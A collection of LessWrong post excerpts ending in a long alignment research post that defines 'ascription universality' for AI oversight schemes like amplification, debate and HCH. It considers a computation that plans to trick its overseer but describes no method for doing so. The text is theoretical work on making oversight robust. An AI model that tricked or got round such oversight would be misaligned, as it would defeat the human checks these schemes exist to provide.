id | source | formatted_source | text
|---|---|---|---|
72242a05-8758-46dc-b3c3-9ebdda967220 | trentmkelly/LessWrong-43k | LessWrong | In the presence of disinformation, collective epistemology requires local modeling
In Inadequacy and Modesty, Eliezer describes modest epistemology:
> How likely is it that an entire country—one of the world’s most advanced countries—would forego trillions of dollars of real economic growth because their monetary controllers—not politicians, but appointees from the professional elite—were doing something so wrong that even a non-professional could tell? How likely is it that a non-professional could not just suspect that the Bank of Japan was doing something badly wrong, but be confident in that assessment?
> Surely it would be more realistic to search for possible reasons why the Bank of Japan might not be as stupid as it seemed, as stupid as some econbloggers were claiming. Possibly Japan’s aging population made growth impossible. Possibly Japan’s massive outstanding government debt made even the slightest inflation too dangerous. Possibly we just aren’t thinking of the complicated reasoning going into the Bank of Japan’s decision.
> Surely some humility is appropriate when criticizing the elite decision-makers governing the Bank of Japan. What if it’s you, and not the professional economists making these decisions, who have failed to grasp the relevant economic considerations?
> I’ll refer to this genre of arguments as “modest epistemology.”
I see modest epistemology as attempting to defer to a canonical perspective: a way of making judgments that is a Schelling point for coordination. In this case, the Bank of Japan has more claim to canonicity than Eliezer does regarding claims about Japan's economy. I think deferring to a canonical perspective is key to how modest epistemology functions and why people find it appealing.
In social groups such as effective altruism, canonicity is useful when it allows for better coordination. If everyone can agree that charity X is the best charity, then it is possible to punish those who do not donate to charity X. This is similar to law: if a legal court makes a judgment that is not overturned, that ju |
6bb991c1-93c8-4f2d-9679-3c62c80805a9 | trentmkelly/LessWrong-43k | LessWrong | central planning is intractable (polynomial, but n is large)
Three Toed Sloth has a nice exposition on the difficulties of optimizing an economy, including the best explanation of convex optimization ever:
> If plan A calls for 10,000 diapers and 2,000 towels, and plan B calls for 2,000 diapers and 10,000 towels, we could do half of plan A and half of plan B, make 6,000 diapers and 6,000 towels, and not run up against the constraints. |
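To make the quoted point concrete, here is a toy Python sketch (the plan numbers are from the quote; the capacity constraints themselves are left implicit): because the constraints are linear, any convex combination of two feasible plans is again feasible.

```python
# A toy sketch of the convexity point in the quote: with linear constraints,
# any mixture of two feasible production plans is itself feasible.
plan_a = {"diapers": 10_000, "towels": 2_000}
plan_b = {"diapers": 2_000, "towels": 10_000}

def mix(p, q, t):
    # Convex combination t*p + (1-t)*q of two plans.
    return {k: t * p[k] + (1 - t) * q[k] for k in p}

print(mix(plan_a, plan_b, 0.5))  # {'diapers': 6000.0, 'towels': 6000.0}
```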
ab45464d-dbc4-4cdc-8bf7-241076233ccd | trentmkelly/LessWrong-43k | LessWrong | Creating The Simple Math of Everything
Eliezer once proposed an idea for a book, The Simple Math of Everything. The basic idea is to compile articles on the basic mathematics of a wide variety of fields, but nothing too complicated.
> Not Jacobean matrices for frequency-dependent gene selection; just Haldane's calculation of time to fixation. Not quantum physics; just the wave equation for sound in air. Not the maximum entropy solution using Lagrange Multipliers; just Bayes's Rule.
Now, writing a book is a pretty daunting task. Luckily brian_jaress had the idea of creating an index of links to already-available online articles. XFrequentist pointed out that something like this has been done before over at Evolving Thoughts. This initially discouraged me, but it eventually helped me refine what I thought the index should be. A key characteristic of Eliezer's idea is that it should be worthwhile for someone who doesn't know the material to read the entire index. Many of the links at Evolving Thoughts point to rather narrow topics that might not be very interesting to a generalist. Also, there is just plain a ton of stuff to read over there - at least 100 articles.
So we should come up with some basic criteria for the articles. Here is what I suggest (let me know what you think):
1. The index must be short: say 10 - 20 links. Or rather, the core of the index must be short. We can have longer lists of narrower and more in depth articles for people who want to get into more detail about, say, quantum physics or economic growth. But these should be separate from the main index.
2. Each article must meet minimum requirements in terms of how interesting the topic is and how important it is. Remember, this is an index for the reader to gain a general understanding of many fields.
3. The article must include some math - at minimum, some basic algebra. Calculus is good as long as it significantly adds to the article. In fact, this should probably be the basic rule for all additions of complex mat |
1a7a3248-3496-4151-87b2-b0f6c942a801 | trentmkelly/LessWrong-43k | LessWrong | Boston MA: Optimal Philanthropy Meetup (July 6th)
Julia and I have done a lot of thinking and writing about how to do the most good in the world [1] [2] but we don't have things all figured out. We'd love to talk to other people interested in optimal philanthropy, so if you're in the Boston area on Friday July 6th we'd love to have you over for dinner and discussion.
Details:
* RSVP for directions (West Medford)
* 6pm to about 9pm
* 94 bus from the red line, 95 bus from the orange line.
* We can give rides back into the city at the end of the evening.
* RSVPs would be nice; let us know if you have dietary restrictions.
[1] Julia's blog: givinggladly.com
[2] Jeff's posts on giving: jefftk.com/giving |
5e434b4d-4d88-4cd3-836a-cba1bd600060 | trentmkelly/LessWrong-43k | LessWrong | Schizophrenia as a deficiency in long-range cortex-to-cortex communication
(Written in a hurry. I was almost going to title this “My poorly-researched pet theory of schizophrenia”. Hoping for feedback and pointers to relevant prior literature. I am very far from a schizophrenia expert. Really. I cannot emphasize this enough. Like, if I took an undergraduate psych test on schizophrenia right now, I might well flunk it.)
1. What’s my hypothesis?
My hypothesis is that the root cause of schizophrenia is (…drumroll…) a deficiency in medium- to long-range cortex-to-cortex connections. Some elaboration:
* When I say “deficiency”, I mean either “the connections aren’t there in their normal numbers” or “the connections are there, but for some reason they’re not accomplishing what they accomplish in neurotypical people”.
* When I say “cortex-to-cortex connections”, I think the main culprit is direct connections between Cortex Region A and Cortex Region B, but it’s also possible that the relevant thing is indirect connections between Cortex Region A and Cortex Region B, e.g. via the thalamus or cerebellum.
* When I say “medium- to long-range”, this definitely includes e.g. connections between different lobes, and it probably also includes connections across a few centimeters of cortex in humans. I haven’t really thought about what would happen if there was a deficiency in all connections of any length, including the very short ones, but I would weakly guess that this would present as schizophrenia as well.
2. How did I originally come up with that hypothesis?
I can pinpoint the exact moment: I was reading about visual processing abnormalities in schizophrenia, and more specifically the paper Weak Suppression of Visual Context in Chronic Schizophrenia (Dakin, Carlin, Hemsley 2005). They showed people pictures like this:
The task was to match the image contrast in the red circle to one of the circles on the left. The eye-popping results were:
1. the schizophrenics did better than the control group,
2. …with a p-value of 0.0000002!
3. Indee |
a5afb94d-176d-4c38-af3e-37ba63aad7dd | trentmkelly/LessWrong-43k | LessWrong | Firming Up Not-Lying Around Its Edge-Cases Is Less Broadly Useful Than One Might Initially Think
Reply to: Meta-Honesty: Firming Up Honesty Around Its Edge-Cases
Eliezer Yudkowsky, listing advantages of a "wizard's oath" ethical code of "Don't say things that are literally false", writes—
> Repeatedly asking yourself of every sentence you say aloud to another person, "Is this statement actually and literally true?", helps you build a skill for navigating out of your internal smog of not-quite-truths.
I mean, that's one hypothesis about the psychological effects of adopting the wizard's code.
A potential problem with this is that human natural language contains a lot of ambiguity. Words can be used in many ways depending on context. Even the specification "literally" in "literally false" is less useful than it initially appears when you consider that the way people ordinarily speak when they're being truthful is actually pretty dense with metaphors that we typically don't notice as metaphors because they're common enough to be recognized as legitimate uses that all fluent speakers will understand.
For example, if I want to convey the meaning that our study group has covered a lot of material in today's session, and I say, "Look how far we've come today!" it would be pretty weird if you were to object, "Liar! We've been in this room the whole time and haven't physically moved at all!" because in this case, it really is obvious to all ordinary English speakers that that's not what I meant by "how far we've come."
Other times, the "intended"[1] interpretation of a statement is not only not obvious, but speakers can even mislead by motivatedly equivocating between different definitions of words: the immortal Scott Alexander has written a lot about this phenomenon under the labels "motte-and-bailey doctrine" (as coined by Nicholas Shackel) and "the noncentral fallacy".
For example, Zvi Mowshowitz has written about how the claim that "everybody knows" something[2] is often used to establish fictitious social proof, or silence those attempting to tell the thing to |
397bbf0e-c179-4d2e-9413-676f10d118f4 | trentmkelly/LessWrong-43k | LessWrong | Preference Inversion
Sometimes the preferences people report or even try to demonstrate are better modeled as a political strategy and response to coercion, than as an honest report of intrinsic preferences. Modeling this correctly is important if you want to try to efficiently satisfy others' intrinsic preferences, or even your own. So I'm sharing something I wrote on the topic elsewhere.
You asked why people who "believe in" avoiding nonmarital sex so frequently engage in and report badly regretting it. Instead of responding within your frame, I'm going to lay out the interpretive framework that seems most natural to me to use for this problem, and then answer in those terms.
We can call things or actions good or bad, right or wrong, with reference to some intention that both the speaker and listener have in mind. For instance, a sturdier and sharper knife is a better one, because our uses for knives tend to converge. We can expect to be understood when we call some knives "good" and leave out "for cutting," and likewise when we call spoiled food bad without reference to a shared interest, because it harms the body of the eater, which harm we generally expect animals to try to avoid.
Moral injunctions such as "it is wrong to lie," "it is bad to steal," can diverge from the local interests of the organism being admonished, in service of a larger, convergent goal. By abstaining from some narrowly self-interested behaviors now, we preserve the necessary conditions for our needs to be met in the future, and the relation between the costs and the benefits can in principle be explained within the system of reference that judges actions as good or bad.
Not all injunctions are like this. For instance, reproduction is such a large component of inclusive fitness that it's not clear what good an organism could get to compensate it for forgoing reproduction. If, like the early Essenes or Christians, we judge sexual desire and activity to be simply bad, we cannot explain this inside the moral |
28106ea1-2667-4d98-bfd2-305b4eeba0d6 | trentmkelly/LessWrong-43k | LessWrong | Economics of Bitcoin
I haven't read/listened to them, but I thought these might be interesting to the local bitcoin users:
Eli Dourado (GMU econ PhD candidate) on the economics of cryptocurrency.
Econtalk podcast - Russ Roberts (GMU econ prof) with Gavin Andresen, Principal of the BitCoin Virtual Currency Project, on Virtual Currency.
Roberts' podcast is always stimulating even if I disagree with him, and Eli is a pretty insightful guy who I've met in meatspace.
|
2843c1f6-1108-41b9-b0d6-3a0a7cdc692b | trentmkelly/LessWrong-43k | LessWrong | The man and the tool
The man and the first tools
150,000 years ago there were Homo Sapiens very similar to us in Africa. However, they did not begin to dominate the world until about 70,000 years ago. Between 150,000 and 70,000 years ago, Homo Sapiens was just another animal struggling to survive, weak and clumsy, not yet the dominant animal on planet Earth that it is today.
Between 70,000 and 30,000 years ago, Homo Sapiens started making cool things like boats, oil lamps, bows and arrows, and needles. These achievements are thought to have been the product of a revolution in the cognitive abilities of Sapiens. There are different theories of the cause of what is known as the cognitive revolution. Although it is interesting to investigate the causes of the cognitive revolution, it is also interesting to analyze its consequences.
The creation and use of tools by humans did not begin 70,000 years ago. The human being and his ancestors have been creating and using tools for millions of years. The first tools used by our human ancestors were stones, and this fact marked the beginning of what we know as the Stone Age. The Stone Age began approximately 3 million years ago and ended when metals were discovered and used. Stone tools were made by gradually grinding away stones to make hammers, spear and arrow points, knives, and scrapers.
The progress of human tools is evident: 3 million years ago we had stones, and now we have rockets and spaceships. There seems to be a correlation between man's tools and man's evolution. Human evolution produced tools, and the production of tools drove human progress. The use of tools gives us leverage, amplifying our capabilities. Tools are what we currently call technology.
A scene from a movie that I find fascinating about the tools of man is from the movie 2001: A Space Odyssey. I am fascinated by the contrast it makes between bone, a primitive tool, and a spaceship, the pinnacle of hum |
35624a6e-a63a-435b-94c0-a2814583b53f | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | Towards formalizing universality
(*[Cross-posted at ai-alignment.com](https://ai-alignment.com/towards-formalizing-universality-409ab893a456)*)
The scalability of [iterated amplification](https://arxiv.org/pdf/1810.08575.pdf) or [debate](https://arxiv.org/abs/1805.00899) seems to depend on whether large enough teams of humans can carry out arbitrarily complicated reasoning. Are these schemes “universal,” or are there kinds of reasoning that work but which humans fundamentally can’t understand?
This post defines the concept of “ascription universality,” which tries to capture the property that a question-answering system **A** is better-informed than any particular simpler computation **C**.
[These](https://ai-alignment.com/informed-oversight-18fcb5d3d1e1) [parallel](https://ai-alignment.com/universality-and-consequentialism-within-hch-c0bee00365bd) [posts](https://ai-alignment.com/universality-and-model-based-rl-b08701394ddd) explain why I believe that the alignment of iterated amplification largely depends on whether HCH is ascription universal. Ultimately I think that the “right” definition will be closely tied to the use we want to make of it, and so we should be refining this definition in parallel with exploring its applications.
I’m using the awkward term “ascription universality” partly to explicitly flag that this is a preliminary definition, and partly to reserve linguistic space for the better definitions that I’m optimistic will follow.
(Thanks to Geoffrey Irving for discussions about many of the ideas in this post.)
**I. Definition**
=================
We will try to define what it means for a question-answering system **A** to be “ascription universal.”
**1. Ascribing beliefs to A**
-----------------------------
Fix a language (e.g. English with arbitrarily big compound [terms](https://ai-alignment.com/approval-directed-algorithm-learning-bf1f8fad42cd)) in which we can represent questions and answers.
To ascribe beliefs to **A**, we ask it. If **A**(“are there infinitely many twin primes?”) = “probably, though it’s hard to be sure” then we ascribe that belief about twin primes to **A**.
This is not a general way of ascribing "belief." This procedure wouldn't capture the beliefs of a native Spanish speaker, or of someone who wasn't answering questions honestly. But it can give us a sufficient condition, and is particularly useful for someone who wants to use **A** as part of an alignment scheme.
Even in this “straightforward” procedure there is a lot of subtlety. In some cases there are questions that we can’t articulate in our language, but which (when combined with **A**’s other beliefs) have consequences that we can articulate. In this case, we can infer something about **A**’s beliefs from its answers to the questions that we can articulate.
**2. Ascribing beliefs to arbitrary computations**
--------------------------------------------------
We are interested in whether **A** “can understand everything that could be understood by someone.” To clarify this, we need to be more precise about what we mean by “could be understood by someone.”
This will be the most informal step in this post. (Not that any of it is very formal!)
We can imagine various ways of ascribing beliefs to an arbitrary computation **C**. For example:
* We can give **C** questions in a particular encoding and assume its answers reflect its beliefs. We can either use those answers directly to infer **C**’s beliefs (as in the last section), or we can ask what set of beliefs about latent facts would explain **C**’s answers.
* We can view **C** as optimizing something and ask what set of beliefs rationalize that optimization. For example, we can give **C** a chess board as input, see what move it produces, assume it is trying to win, and infer what it must believe. We might conclude that **C** believes a particular line of play will be won by black, or that **C** believes general heuristics like “a pawn is worth 3 tempi,” or so on.
* We can reason about how **C**'s behavior depends on facts about the world, and ask what state of the world is determined by its current behavior. For example, we can observe that **C**(113327) = 1 but that **C**(113327) "would have been" 0 if 113327 had been composite, concluding that **C**(113327) "knows" that 113327 is prime. We can extend to probabilistic beliefs, e.g. if **C**(113327) "probably" would have been 0 if 113327 had been composite, then we might say that **C** knows that 113327 is "probably prime." This certainly isn't a precise definition, since it involves considering logical counterfactuals, and I'm not clear whether it can be made precise. (See also ideas along the lines of ["knowledge is freedom"](https://www.lesswrong.com/posts/b3Bt9Cz4hEtR26ANX/knowledge-is-freedom).) A toy sketch of this idea in code follows this list.
* If a computation behaves differently under different conditions, then we could use restrict attention to a particular condition. For example, if a question-answering system appears to be bilingual but answers questions differently in Spanish and English, we could ascribe two different sets of beliefs. Similarly, we could ascribe beliefs to any subcomputation. For example, if a part of **C** can be understood as optimizing the way data is laid out in memory, then we can ascribe beliefs to that computation about the way that data will be used.
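As a toy illustration of the counterfactual-ascription idea from the third bullet, here is a Python sketch (the program is ours, and the "ascription" step itself remains informal, living in the comments):

```python
def C(n: int) -> int:
    # Trial division: C(n) = 1 iff n is prime.
    if n < 2:
        return 0
    d = 2
    while d * d <= n:
        if n % d == 0:
            return 0
        d += 1
    return 1

print(C(113327))  # 1; and C(n) "would have been" 0 for any composite n,
print(C(113328))  # 0; so this ascription procedure says that C "knows"
                  # that 113327 is prime.
```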
Note that these aren’t intended to be efficient procedures that we could actually apply to a given computation **C**. They are hypothetical procedures that we will use to define what it means for **A** to be universal.
I’m not going to try to ascribe a single set of beliefs to a given computation; instead, I’ll consider all of the reasonable ascription procedures. For example, I think different procedures would ascribe different beliefs to a particular human, and don’t want to claim there is a unique answer to what a human “really” believes. A universal reasoner needs to have more reasonable beliefs than the beliefs ascribed to a human using any particular method.
An ascription-universal reasoner needs to compete with any beliefs that can be ascribed to **C**, so I want to be generous with this definition. For example, given a chess-playing algorithm, we might rationalize it as trying to win a game and infer its beliefs about the rules of chess. Or we might rationalize it as trying to look like a human and infer its beliefs about what a human would do. Or something different altogether. Most of these will be kind of crazy ascriptions, but I want to compete with them anyway (competing with crazier beliefs will turn out to just be easier).
It’s not totally clear what counts as a “reasonable” ascription procedure, and that’s the biggest source of informality. Intuitively, the key property is that the ascription itself isn’t doing the “hard work.” In practice I’m using an informal extensional definition, guided by examples like those in the bulleted list.
**3. Comparing beliefs**
------------------------
What does it mean to say that one agent is “better-informed” than another?
It’s natural to try to express this in terms of empirical information about the world, but we are particularly interested in the different inferences that agents are able to draw from the same data. Another natural approach is to compare their “knowledge,” but I have no idea how to define knowledge or justified belief. So I’m reduced to working directly with sets of beliefs.
Consider two sets of beliefs, described by the subjective expectations 𝔼¹ and 𝔼². What does it mean to say that 𝔼¹ is better-informed than 𝔼²?
This framing makes it tempting to try something simple: “for every quantity, 𝔼¹’s belief about that quantity is more accurate.” But this property is totally unachievable. Even if 𝔼¹ is obtained by conditioning 𝔼² on a true fact, it will almost certainly happen to update in the “wrong” direction for some claims.
We will instead use a subjective definition, i.e. we’ll define this concept from a particular epistemic position represented by another subjective expectation 𝔼.
Then we say that 𝔼¹ **dominates** 𝔼² (w.r.t. 𝔼) if, for every bounded quantity X and for every “nice” property Φ:
* 𝔼[X|Φ(𝔼¹, 𝔼²)] = 𝔼[𝔼¹[X]|Φ(𝔼¹, 𝔼²)]
(By “nice” I mean something like: simple to define and open in the product topology, viewing 𝔼¹ and 𝔼² as infinite tables of numbers.)
Intuitively, this means that 𝔼 always “trusts” 𝔼¹, even if given arbitrary information about 𝔼¹ and 𝔼². For example, if 𝔼 was told that 𝔼¹[X] ≈ *x* and 𝔼²[X] ≈ *y*, then it would expect X to be around *x* (rather than *y*). Allowing arbitrary predicates Φ lets us make stronger inferences, effectively that 𝔼 thinks that 𝔼¹ captures *everything* useful about 𝔼².
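As a sanity check on the definition, here is a toy numeric sketch (all modeling choices are illustrative, not from the post): worlds are uniform under 𝔼, expert 𝔼¹ observes the world exactly, and expert 𝔼² predicts the prior mean. Conditioning on information Φ about the predictors' outputs, 𝔼 defers to 𝔼¹ but not to 𝔼²:

```python
# Toy model: worlds w in {0,1,2,3} are uniform under our outer beliefs E;
# X = 1 iff w >= 2. Expert E1 observes w exactly; E2 observes nothing.
worlds = [0, 1, 2, 3]
X = {w: float(w >= 2) for w in worlds}
E1 = {w: X[w] for w in worlds}   # E1 knows w, so E1[X] equals X
E2 = {w: 0.5 for w in worlds}    # E2 always predicts the prior mean

def cond_mean(f, event):
    # E[f | event] under the uniform prior over worlds.
    ws = [w for w in worlds if event(w)]
    return sum(f[w] for w in ws) / len(ws)

# Phi: information about the predictors' outputs, e.g. "E1 predicts 1".
phi = lambda w: E1[w] == 1.0

print(cond_mean(X, phi))   # 1.0
print(cond_mean(E1, phi))  # 1.0 -> E trusts E1 given phi (dominance holds)
print(cond_mean(E2, phi))  # 0.5 -> E does not defer to E2 given phi
```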
I’m not sure if this is exactly the right property, and it becomes particularly tricky if the quantity X is itself related to the behavior of 𝔼¹ or 𝔼² (continuity in the product topology is the minimum plausible condition to avoid a self-referential paradox). But I think it’s at least roughly what we want and it may be exactly what we want.
Note that dominance is *subjective*, i.e. it depends on the epistemic vantage point 𝔼 used for the outer expectation. This property is a little bit stronger than what we originally asked for, since it also requires 𝔼 to trust 𝔼¹, but this turns out to be implied anyway by our definition of universality so it’s not a big defect.
Note that dominance is a property of the *descriptions* of 𝔼¹ and 𝔼². There could be two different computations that in fact compute the same set of expectations, such that 𝔼 trusts one of them but not the other. Perhaps one computation hard-codes a particular result, while the other does a bunch of work to estimate it. Even if the hard-coded result happened to be correct, such that the two computations had the same outputs, 𝔼 might trust the hard work but not the wild guess.
**4. Complexity and parameterization**
--------------------------------------
There are computations with arbitrarily sophisticated beliefs, so no fixed **A** can hope to dominate everything. To remedy this, rather than comparing to a fixed question-answerer **A**, we’ll compare to a parameterized family **A**[**C**].
I’ll consider two different kinds of potentially-universal reasoners **A**:
* In the “idealized” case, **A**[**C**] depends only on the complexity of **C**.
For example, we might hope that an *n*-round debate dominates any beliefs that could be ascribed to a fast computation with (*n*-1) rounds of [alternation](https://en.wikipedia.org/wiki/Alternating_Turing_machine). In particular, this **A**[**C**] is the same for any two computations **C** of the same complexity.
* In the “practical” case, **A**[**C**] depends on the complexity of **C** but also uses the computation **C** as a hint. For example, if **C** is the training process for a neural net, then we might take **A**[**C**] to be a debate in which the debaters are able to share weights and activations with the neural net throughout the entire training process.
I’m generally interested in the case where **A**[**C**] is only slightly more powerful than **C** itself. This mirrors the setting where a universal Turing machine is able to run any other Turing machine with only a modest slowdown.
**Putting it all together**
---------------------------
We say that a set of beliefs 𝔼ᴬ *epistemically dominates* a computation **C** (w.r.t. some beliefs 𝔼 and language L) if the beliefs ascribed to **A** by the “straightforward” procedure, using L, dominate (w.r.t. 𝔼) the beliefs ascribed to **C** by any reasonable ascription procedure.
We say that a family of question-answering systems **A**[**·**] are *ascription universal* (w.r.t. 𝔼 and L) if **A**[**C**] epistemically dominates **C** for every computation **C**.
**II. Discussion**
==================
**Why is (subjective) dominance sufficient?**
---------------------------------------------
This universality condition requires that *we* believe that **A**[**C**] is better-informed than **C**. Naively we might have wanted it to *actually* be the case that **A**[**C**] is better-informed than **C**; the stronger condition is clearly unachievable, but why should we be satisfied with the weaker condition?
In [applications](https://ai-alignment.com/informed-oversight-18fcb5d3d1e1) [of this](https://ai-alignment.com/universality-and-consequentialism-within-hch-c0bee00365bd) [property](https://ai-alignment.com/universality-and-model-based-rl-b08701394ddd), the subjective condition is what we need in order for *us* to believe that **A**[**C**] will cope with the challenges posed by **C**. For example, suppose that **C** formulates a plan to “trick” **A**[**C**]. Then the subjective universality condition implies that we don’t expect **C** to succeed.
This isn’t as good as actually knowing that **C** won’t succeed. But I think it should be good enough for us — the reason we are thinking about AI safety is because we are concerned that something bad will happen. If we find a technique that defuses this argument, then we’ve addressed the motivating problem. It may still be the case that bad things happen (and we should still search for additional reasons that bad things might happen), but we don’t particularly expect them to.
Of course if you select over a large number of computations, then you may find one that will succeed in tricking **A**. But if we are concerned about that, then we can instead apply ascription universality to the entire process including the selection.
**Why trust opaque computation?**
---------------------------------
If **C** uses some clever heuristics that I don’t understand, then **C**’s “beliefs” might be excellent, but I might not *expect* them to be excellent. In this sense understanding may seem almost vacuous. If there is some heuristic that I trust, wouldn’t **A** just use it?
To see why the definition is demanding, consider the special case where **C** performs an extensive search to find a computation that works well empirically. For example, **C** might be the following computation (a toy sketch in code follows the list):
* Start with a training set of (image, label) pairs.
* Search over simple programs to find one that makes good predictions.
* Run that simple program on a new image to predict its label.
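Here is a toy version of that computation (everything is hypothetical: the "simple programs" are just threshold rules on a two-feature input, and the dataset is made up):

```python
# A toy instance of C: enumerate "simple programs" (threshold rules on one
# feature), keep the one that best predicts the training labels, then run
# it on a new input. All details are illustrative.
from itertools import product

train = [((0.9, 0.1), "dog"), ((0.8, 0.3), "dog"), ((0.2, 0.7), "cat")]

def programs():
    # A tiny program space: predict "dog" iff feature[i] > threshold.
    for i, t in product(range(2), [0.1 * k for k in range(10)]):
        yield lambda x, i=i, t=t: "dog" if x[i] > t else "cat"

def C(new_input):
    def accuracy(f):
        return sum(f(x) == y for x, y in train)
    best = max(programs(), key=accuracy)  # search over simple programs
    return best(new_input)                # run the winner on a new image

print(C((0.85, 0.2)))  # "dog"
```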
In this case, we can ascribe beliefs to **C** about the contents of the new image. And because those beliefs are coming from a simple program that works empirically, I expect them to be accurate (in some respects).
For example, a simple classifier **C** may “believe” that the new image contains a particular curve that typically appears in images labeled “dog;” or a really sophisticated classifier may perform complex deductions about the contents of the scene, starting from premises that were empirically validated on the training set.
So it’s not OK for **A** to simply ignore whatever heuristics **C** is using — if those heuristics have the kind of empirical support that makes us think they actually work, then A needs to be able to understand everything that those heuristics imply about the domain.
**Why be so general?**
----------------------
I’ve formulated universality as competing with arbitrary computations **C**. It seems totally possible that the form of **C** discussed in the last section — searching for a program that works well in practice and then using it in a new situation — is so central that the definition of universality should focus entirely on it.
One reason to use the broader definition is because sometimes this “selection” process can be embedded in a non-trivial way in a larger computation. For example, if I have a sufficiently large group of humans, I might expect memetic selection to occur and produce systems that could be said to have “beliefs,” and I’d like universal systems to dominate those beliefs as well.
The other reason to use this very general definition is because I don’t see an easy way to simplify the definition by using the additional structural assumption about **C**. I do think it’s likely there’s a nicer statement out there that someone else can find.
**Universal from whose perspective?**
-------------------------------------
Unfortunately, achieving universality depends a lot on the epistemic perspective 𝔼 from which it is being evaluated. For example, if 𝔼 knows any facts, then a universal agent must know all of those facts as well. Thus “a debate judged by Paul” may be universal from Paul’s perspective, but “a debate arbitrated by Alice” cannot be universal from my perspective unless I believe that Alice knows everything I know.
This isn’t necessarily a big problem. It will limit us to conclusions like: Google engineers believe that the AI they’ve built serves the user’s interests reasonably well. The user might not agree with that assessment, if they have different beliefs from Google engineers. This is what you’d expect in any case where Google engineers build a product, however good their intentions.
(Of course Google engineers’ notion of “serving the user’s interests” can involve deferring to the user’s beliefs in cases where they disagree with Google engineers, just as they could defer to the user’s beliefs with other products. That gives us reason to be less concerned about such divergences, but eventually these evaluations do need to bottom out somewhere.)
This property becomes more problematic when we ask questions like: is there a way to [seriously limit the inputs and outputs to a human while preserving universality of HCH](https://ai-alignment.com/universality-and-security-amplification-551b314a3bab)? This causes trouble because even if limiting the human intuitively preserves universality, it will effectively eliminate some of the human’s knowledge and know-how that can [only be accessed on large inputs](https://medium.com/@weidai/to-put-it-another-way-a-human-translator-has-learned-a-lot-of-valuable-information-much-of-it-48457f95b9bf), and hence violate universality.
So when investigating schemes based on this kind of impoverished human, we would need to evaluate universality from some impoverished epistemic perspective. We’d like to say that the impoverished perspective is still “good enough” for us to feel safe, despite not being good enough to capture literally everything we know. But now we risk begging the question: how do we evaluate whether the impoverished perspective is good enough? I think this is probably OK, but it’s definitely subtle.
I think that defining universality w.r.t. 𝔼 is an artifact of this definition strategy, and I’m optimistic that a better definition wouldn’t have this dependence, probably by directly attacking the notion of “justified” belief (which would likely also be useful for actually establishing universality, and may even be necessary). But that’s a hard problem. Philosophers have thought about very similar problems extensively without making the kind of progress that seems adequate for our purposes, and I don’t see an immediate angle of attack.
**III. Which A might be universal?**
====================================
**Two regimes**
---------------
I’m interested in universality in two distinct regimes:
* Universality of idealized procedures defined in terms of perfect optimization, such as [debate](https://arxiv.org/abs/1805.00899) under optimal play or [max-HCH](https://ai-alignment.com/humans-consulting-hch-f893f6051455), where **A**[**C**] depends only on the computational complexity of **C**.
* Universality of practical variants, in which the perfect optimization is replaced by a bounded optimization, which might use the computation **C** as a “hint.” For example, we might consider amplification or debate where the agents are allowed to inspect a transcript of **C**; or if **C** is a neural net training process, we might train them jointly with **C**.
**Idealized models**
--------------------
**A**[**C**] could be:
* A debate, judged by a human, with perfect debaters, whose length depends on the complexity of **C**. (Hopefully in such a way that **A**[**A**[**C**]] is only a slightly longer debate than **A**[**C**].)
* max-HCH, using perfect optimization rather than a bounded optimizer. Again, we can impose a budget limit that depends on the complexity of **C**, ideally such that **A**[**A**[**C**]] does not involve a much larger computation than **A**[**C**].
* Use HCH to implement two functions, Info and Answer. Define **A**[**C**](Q) to be Answer(Q, *a\**), where *a\** = argmax Info(*a*, Q), and the optimization is over advice strings *a* of length comparable to the description of **C** (sketched in code below).
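For concreteness, a brute-force sketch of that last model, with Info and Answer as stand-in callables for functions that would actually be implemented by HCH (the interface here is an assumed toy):

```python
# A brute-force sketch of A[C](Q) = Answer(Q, a*), a* = argmax_a Info(a, Q),
# over advice strings of bounded length. Info and Answer are placeholders.
from itertools import product

def best_advice(question, info, max_len=8, alphabet="01"):
    # a* = argmax_a Info(a, question) over advice strings up to max_len.
    candidates = ("".join(s) for k in range(max_len + 1)
                  for s in product(alphabet, repeat=k))
    return max(candidates, key=lambda a: info(a, question))

def A(question, info, answer, max_len=8):
    return answer(question, best_advice(question, info, max_len))
```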
I don’t think any of these would be universal if instantiated with an open-ended human policy — providing arbitrary complex inputs to a human is likely to lead to bad behavior. Instead, I imagine restricting the human to some small enough space of inputs that they can behave “reasonably” over the whole space, while still being rich enough to be universal. Even as such, I think [additional measures](https://ai-alignment.com/universality-and-consequentialism-within-hch-c0bee00365bd) might be needed to achieve security (since a team of humans may behave badly in some exotic corners of the input space, even if individual humans are sheltered from exotic inputs).
**Practical models**
--------------------
In practice I’m particularly interested in the case where **C** has the special form described in the “Why trust opaque computation?” section: it trains a neural net on some dataset, and then runs that neural network on new inputs.
**A**[**C**] could be:
* Debates arbitrated by a human where the debaters are trained jointly with **C**, and can make references to individual examples from the dataset.
* max-HCH where the agent is trained jointly with **C**, and the overseer can consult individual entries from the dataset.
* HCH, combined with interpretability techniques that allow it to get information about what **C** is thinking and to relate its behavior to the dataset on which it was trained.
For each of these practical variants, I don’t expect it to be universal unless the corresponding idealized model is. So we can think of dividing the universality question into two pieces:
* Would our procedure be universal *if the optimization was performed perfectly*?
* Is weight sharing / interpretability strong enough to solve the optimization problems needed for universality?
I think none of the suggestions in this section are plausibly universal without some additional mechanisms, and so even if HCH or debate is universal, additional ideas are needed in order to translate those to practical universal systems. I’m still inclined to focus on the idealized case, because I want to better understand what is needed for universality without thinking about algorithmic difficulties.
**IV. Which C are hard to epistemically dominate?**
===================================================
The definition in this post was somewhat informal, but the discussion in this appendix will be extremely informal. The purpose is to communicate some of my early thinking about universality and my sense for what a universal reasoner might look like.
The first three examples will consider programs **C** with the following form:
* Iterate over programs to find an *f* that successfully predicts the answers to some dataset of historical questions for which we know the answer.
* Use that program to predict the answers to future questions.
The different examples explore features of *f* that might make it difficult to dominate the overall computation.
**Deduction**
-------------
Suppose *f* takes the following form:
* Given a question and context, it performs a short series of deductions from facts in the context, together with some axioms (e.g. “Bob’s eyes are more likely to twitch when he is lying,” the rules of poker, *etc.*)
* When it arrives at answers that constrain the possible answers to the given question, it outputs an answer consistent with those constraints.
We could attribute the statements produced by this process to **C** as beliefs. We expect this set of beliefs to have useful information because it was selected for making correct predictions.
Fortunately, if HCH is able to see the training dataset then it may be able to arrive at similarly accurate views (a toy numeric sketch follows this list):
* It can compute that P(observations | axioms) is high by following along with the deductive process used by *f*.
* Bayes implies that the axioms are likely to be true (fully capturing the argument which leads us, from our current perspective, to expect them to be true).
* Once HCH knows the axioms are likely to be true, it can follow along with the deductive process to reproduce all of *f*’s beliefs.
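A toy numeric version of this Bayesian update (all numbers are hypothetical; the likelihood function is a stand-in for following along with *f*'s deductions):

```python
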